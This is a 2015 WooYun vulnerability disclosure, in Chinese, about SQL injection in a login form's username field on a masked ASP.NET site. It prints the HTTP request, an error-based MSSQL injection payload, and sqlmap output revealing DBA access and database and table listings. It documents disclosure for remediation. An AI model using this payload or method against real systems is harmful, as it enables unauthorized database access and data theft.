乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-16: 细节已通知厂商并且等待厂商处理中 2015-10-20: 厂商已经确认,细节仅向厂商公开 2015-10-30: 细节向核心白帽子及相关领域专家公开 2015-11-09: 细节向普通白帽子公开 2015-11-19: 细节向实习白帽子公开 2015-12-04: 细节向公众公开
如题
http://**.**.**.**/fzbzgzj/login.aspx 登录页面存在注入注入参数:txt_UserName
POST /fzbzgzj/login.aspx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://**.**.**.**/fzbzgzj/login.aspxCookie: ASP.NET_SessionId=sfqdwy45rv2yhr554ybza445Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 352__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=DLDTgWbWOjna7vMb3Fjz8pL9VR1exguHe%2F9sMbYMyJJp%2FXmBgxXVe%2Bw797VuaL55DCT61ECGAvEYDFiWik6lfFhfVALW1OsQbxXWaWZJbHSKob5SakRg96fv893KoxBfaUOdh67uuChrG%2BfBi4fbSUDIQR7O9gtiiOSpJf%2FBc%2BcKgZmTqPbjWp1UzSTEqbSq853G%2BA%3D%3D&txt_UserName=admin&txt_PassWord=123456&txt_SerialNumber=y6fz&btn_Login.x=66&btn_Login.y=6
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txt_UserName Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=lLnnV5NTKs8RQeHVCWY08ks8CwO1sVML/RUis80Jtu3DJ1Jy8RRAjCmIL7AWLggHSWVDR4qGya7+8N2oQ/4lnKC2jlPL8okxttBnwup+L2Jw9QONjVGwRP7JYE/gzphWs3Q4QTVLytRVbAm3wUlajW7bPUA7LMLKdzGwoK4Lsj7IA6FiyyYmUx4t/YVrmgTFHPy7ow==&txt_UserName=admin' AND 3611=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(111)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (3611=3611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(100)+CHAR(110)+CHAR(113))) AND 'RoWc'='RoWc&txt_PassWord=123456&txt_SerialNumber=y6fz&btn_Login.x=66&btn_Login.y=6---[14:58:08] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[14:58:08] [INFO] fetching current user[14:58:09] [WARNING] reflective value(s) found and filtering out[14:58:09] [INFO] retrieved: sacurrent user: 'sa'[14:58:09] [INFO] fetching current database[14:58:10] [INFO] retrieved: FZBWBcurrent database: 'FZBWB'[14:58:10] [INFO] testing if current user is DBAcurrent user is DBA: True[14:58:11] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'
数据库available databases [10]:[*] FZBWB[*] fzbwbxt[*] fzbwsbb[*] fzbzgzj[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
数据表
Database: ReportServerTempDB[9 tables]+-------------------------+| ChunkData || ChunkSegmentMapping || ExecutionCache || PersistedStream || Segment || SegmentedChunk || SessionData || SessionLock || SnapshotData |+-------------------------+
Database: FZBWB[100 tables]+-------------------------+| AdministrationArea || AdministrationUnit || AffairAction || AffairBase || AffairEndDateSet || AffairSequence || AffairSubFunc || AffairType || AffairWaitStart || Annex || AnnexType || BaseDataBasic || BaseDataType || BaseDataUIConfig || BreakDate || CalendarProgram || Certificate || CertificateChangeApply || CertificateEnd || CertificateEndDetail || CertificateReissueApply || ChildFunction || CodeControl || CodeControl2 || CodeControl3 || ComTaskGroup || CommPhrase || CommPhraseGroup || CommReceiver || CommTask || CompetencyApply || CompetencyApplyDetail || ConsumerList || DataItem || DataItemReEntity || DataItemType || DataItemView || DataPurview || DataTypeColl || DataViewCol || DataViewQrCol || DataViewSort || DateDetail || DayRule || DelayRecord || Department || Dept || DeptTemplate || DetailPurview || DispDocSign || DispDocSignSet || EasyReportCell || EasyReportCol || EasyReportDataRow || EasyReportRow || EasyReportTable || Entity || EntityField || EntityFieldExpand || ExpandItems || ExpandList || FileICP || FileRegister || FileType || Im_friendItems || Im_groupInfo || Im_groupItems || Im_groupOfflineMessage || Im_offlineMessage || Inbox || InsRelation || InstitutionRelMode || InstitutionType || LawOffice || LogicGroup || LoginInfo || MDFunc || MDInfo || ManageCor || MdPackage || Member || MemberInLogicGroup || MemberRoleRelation || MonthDayRule || MonthWeekRule || MsgSign || OfferCheck || Organization || OrganizeConfig || OrganizeType || PackageFuns || Parameter || PerYear || QScheme || QSchemeSub || RegICPFile || RegistrationApply || RegistrationApplyDetail || RepSavedResult || ReportsCol |+-------------------------+[14:59:35] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'
已证明漏洞存在,未深入。
危害等级:高
漏洞Rank:10
确认时间:2015-10-20 16:55
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无